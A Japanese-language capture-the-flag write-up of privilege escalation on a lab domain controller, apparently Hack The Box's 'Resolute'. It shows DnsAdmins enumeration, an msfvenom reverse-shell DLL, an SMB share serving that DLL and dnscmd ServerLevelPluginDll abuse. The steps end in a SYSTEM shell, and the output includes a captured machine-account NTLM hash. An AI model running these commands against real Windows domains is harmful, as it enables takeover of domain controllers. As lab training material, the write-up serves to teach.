横展開先で情報収集

whoami

*Evil-WinRM* PS C:\Users\ryan\Documents> whoami /all

USER INFORMATION
----------------

User Name     SID
============= ==============================================
megabank\ryan S-1-5-21-1392959593-3013219662-3596683436-1105


GROUP INFORMATION
-----------------

Group Name                                 Type             SID                                            Attributes
========================================== ================ ============================================== ===============================================================
Everyone                                   Well-known group S-1-1-0                                        Mandatory group, Enabled by default, Enabled group
BUILTIN\Users                              Alias            S-1-5-32-545                                   Mandatory group, Enabled by default, Enabled group
BUILTIN\Pre-Windows 2000 Compatible Access Alias            S-1-5-32-554                                   Mandatory group, Enabled by default, Enabled group
BUILTIN\Remote Management Users            Alias            S-1-5-32-580                                   Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\NETWORK                       Well-known group S-1-5-2                                        Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\Authenticated Users           Well-known group S-1-5-11                                       Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\This Organization             Well-known group S-1-5-15                                       Mandatory group, Enabled by default, Enabled group
MEGABANK\Contractors                       Group            S-1-5-21-1392959593-3013219662-3596683436-1103 Mandatory group, Enabled by default, Enabled group
MEGABANK\DnsAdmins                         Alias            S-1-5-21-1392959593-3013219662-3596683436-1101 Mandatory group, Enabled by default, Enabled group, Local Group
NT AUTHORITY\NTLM Authentication           Well-known group S-1-5-64-10                                    Mandatory group, Enabled by default, Enabled group
Mandatory Label\Medium Mandatory Level     Label            S-1-16-8192


PRIVILEGES INFORMATION
----------------------

Privilege Name                Description                    State
============================= ============================== =======
SeMachineAccountPrivilege     Add workstations to domain     Enabled
SeChangeNotifyPrivilege       Bypass traverse checking       Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set Enabled


USER CLAIMS INFORMATION
-----------------------

User claims unknown.

Kerberos support for Dynamic Access Control on this device has been disabled.
  • 評価
    • DNSAdminのためDNSを利用した攻撃ができそう

DNS関係の調査

# process確認
*Evil-WinRM* PS C:\Users\ryan\Documents> Get-Process -Name dns

Handles  NPM(K)    PM(K)      WS(K)     CPU(s)     Id  SI ProcessName
-------  ------    -----      -----     ------     --  -- -----------
   5299    3689    69168      68032               844   0 dns

# dnscmdコマンドの確認
*Evil-WinRM* PS C:\Users\ryan\Documents> dnscmd /Info

Query result:

Server info
        server name              = Resolute.megabank.local
        version                  = 3839000A (10.0 build 14393)
        DS container             = cn=MicrosoftDNS,cn=System,DC=megabank,DC=local
        forest name              = megabank.local
        domain name              = megabank.local
        builtin forest partition = ForestDnsZones.megabank.local
        builtin domain partition = DomainDnsZones.megabank.local
        read only DC             = 0
        last scavenge cycle      = not since restart (0)
  Configuration:
        dwLogLevel               = 00000000
        dwDebugLevel             = 00000000
        dwRpcProtocol            = 00000005
        dwNameCheckFlag          = 00000002
        cAddressAnswerLimit      = 0
        dwRecursionRetry         = 3
        dwRecursionTimeout       = 8
        dwDsPollingInterval      = 180
  Configuration Flags:
        fBootMethod                  = 3
        fAdminConfigured             = 1
        fAllowUpdate                 = 1
        fDsAvailable                 = 1
        fAutoReverseZones            = 1
        fAutoCacheUpdate             = 0
        fSlave                       = 0
        fNoRecursion                 = 0
        fRoundRobin                  = 1
        fStrictFileParsing           = 0
        fLooseWildcarding            = 0
        fBindSecondaries             = 0
        fWriteAuthorityNs            = 0
        fLocalNetPriority            = 1
  Aging Configuration:
        ScavengingInterval           = 0
        DefaultAgingState            = 0
        DefaultRefreshInterval       = 168
        DefaultNoRefreshInterval     = 168
  ServerAddresses:

        Ptr          = 00000192FEBAF370
        MaxCount     = 1
        AddrCount    = 1
                Addr[0] => af=2, salen=16, [sub=0, flag=00000000] p=13568, addr=10.10.10.169

  ListenAddresses:
        NULL IP Array.
  Forwarders:
        NULL IP Array.
        forward timeout  = 3
        slave            = 0
Command completed successfully.

# Serviceの確認
*Evil-WinRM* PS C:\Users\ryan\Documents> sc.exe query dns

SERVICE_NAME: dns
        TYPE               : 10  WIN32_OWN_PROCESS
        STATE              : 4  RUNNING
                                (STOPPABLE, PAUSABLE, ACCEPTS_SHUTDOWN)
        WIN32_EXIT_CODE    : 0  (0x0)
        SERVICE_EXIT_CODE  : 0  (0x0)
        CHECKPOINT         : 0x0
        WAIT_HINT          : 0x0
*Evil-WinRM* PS C:\Users\ryan\Documents>
  • 評価
    • DNSは動いているし権限はあるのでDNSを利用した権限昇格ができそう

Priviledge Escalation

Kali端末

# KaliでDNS起動時に読み込ませるDLL作成
┌──(kali㉿kali)-[~/Resolute]
└─$ msfvenom -a x64 -p windows/x64/shell_reverse_tcp LHOST=10.10.16.4 LPORT=4444 -f dll --platform windows > rev.dll
# Kaliでsmbserverを立ち上げる shareは共有名 ./はディレクトリパス
┌──(kali㉿kali)-[~/Resolute]
└─$ sudo impacket-smbserver share ./        
[sudo] password for kali: 
Impacket v0.10.0 - Copyright 2022 SecureAuth Corporation

[*] Config file parsed
[*] Callback added for UUID 4B324FC8-1670-01D3-1278-5A47BF6EE188 V:3.0
[*] Callback added for UUID 6BFFD098-A112-3610-9833-46C3F87E345A V:1.0
[*] Config file parsed
[*] Config file parsed
[*] Config file parsed
[*] Incoming connection (10.10.10.169,55298)
[*] AUTHENTICATE_MESSAGE (MEGABANK\RESOLUTE$,RESOLUTE)
[*] User RESOLUTE\RESOLUTE$ authenticated successfully
[*] RESOLUTE$::MEGABANK:aaaaaaaaaaaaaaaa:0e557196bd8edb9b9b2487eb38d8205a:010100000000000000a92a98f73dda01943a90eda68f9fe60000000001
# 別ターミナルでncatを待ち受ける

```bash
┌──(kali㉿kali)-[~]
└─$ rlwrap nc -vlnp 4444
listening on [any] 4444 ...

Victim端末

# dnscmdコマンドでKaliのsmbserverにあるdllを登録
*Evil-WinRM* PS C:\Users\ryan\Documents> dnscmd resolute.megabank.local /config /serverlevelplugindll \\10.10.16.4\share\rev.dll

Registry property serverlevelplugindll successfully reset.
Command completed successfully.
# DNSの停止
*Evil-WinRM* PS C:\Users\ryan\Documents> sc.exe stop dns

SERVICE_NAME: dns
        TYPE               : 10  WIN32_OWN_PROCESS
        STATE              : 3  STOP_PENDING
                                (STOPPABLE, PAUSABLE, ACCEPTS_SHUTDOWN)
        WIN32_EXIT_CODE    : 0  (0x0)
        SERVICE_EXIT_CODE  : 0  (0x0)
        CHECKPOINT         : 0x0
        WAIT_HINT          : 0x0
# DNSの起動
*Evil-WinRM* PS C:\Users\ryan\Documents> sc.exe start dns

SERVICE_NAME: dns
        TYPE               : 10  WIN32_OWN_PROCESS
        STATE              : 2  START_PENDING
                                (NOT_STOPPABLE, NOT_PAUSABLE, IGNORES_SHUTDOWN)
        WIN32_EXIT_CODE    : 0  (0x0)
        SERVICE_EXIT_CODE  : 0  (0x0)
        CHECKPOINT         : 0x0
        WAIT_HINT          : 0x7d0
        PID                : 3184
        FLAGS              :
# Serviceの確認
*Evil-WinRM* PS C:\Users\ryan\Documents> Get-ItemProperty HKLM:\SYSTEM\CurrentControlSet\Services\DNS\Parameters\ -Name ServerLevelPluginDll


ServerLevelPluginDll : \\10.10.16.4\share\rev.dll
PSPath               : Microsoft.PowerShell.Core\Registry::HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\DNS\Parameters\
PSParentPath         : Microsoft.PowerShell.Core\Registry::HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\DNS
PSChildName          : Parameters
PSDrive              : HKLM
PSProvider           : Microsoft.PowerShell.Core\Registry


# DNSの状態確認
*Evil-WinRM* PS C:\Users\ryan\Documents> Get-Service dns

Status   Name               DisplayName
------   ----               -----------
Running  dns                DNS Server

成功した時の状態

# smbserver
┌──(kali㉿kali)-[~/Resolute]
└─$ sudo impacket-smbserver share ./        
[sudo] password for kali: 
Impacket v0.10.0 - Copyright 2022 SecureAuth Corporation

[*] Config file parsed
[*] Callback added for UUID 4B324FC8-1670-01D3-1278-5A47BF6EE188 V:3.0
[*] Callback added for UUID 6BFFD098-A112-3610-9833-46C3F87E345A V:1.0
[*] Config file parsed
[*] Config file parsed
[*] Config file parsed
[*] Incoming connection (10.10.10.169,55298)
[*] AUTHENTICATE_MESSAGE (MEGABANK\RESOLUTE$,RESOLUTE)
[*] User RESOLUTE\RESOLUTE$ authenticated successfully
[*] RESOLUTE$::MEGABANK:aaaaaaaaaaaaaaaa:0e557196bd8edb9b9b2487eb38d8205a:010100000000000000a92a98f73dda01943a90eda68f9fe600000000010010006d006900520071005400740059006200030010006d00690052007100540074005900620002001000610065005a00510046004b006b00580004001000610065005a00510046004b006b0058000700080000a92a98f73dda0106000400020000000800300030000000000000000000000000400000ca9d33ca5328ab97005c3e74242716f2dbb549652b73135970b0931f6faea6a10a0010000000000000000000000000000000000009001e0063006900660073002f00310030002e00310030002e00310036002e0034000000000000000000
[*] Disconnecting Share(1:IPC$)
[*] Disconnecting Share(2:SHARE)
[*] Closing down connection (10.10.10.169,55298)
[*] Remaining connections []

# nc
┌──(kali㉿kali)-[~]
└─$ rlwrap nc -vlnp 4444
listening on [any] 4444 ...

connect to [10.10.16.4] from (UNKNOWN) [10.10.10.169] 55299
Microsoft Windows [Version 10.0.14393]
(c) 2016 Microsoft Corporation. All rights reserved.

C:\Windows\system32>

Discussion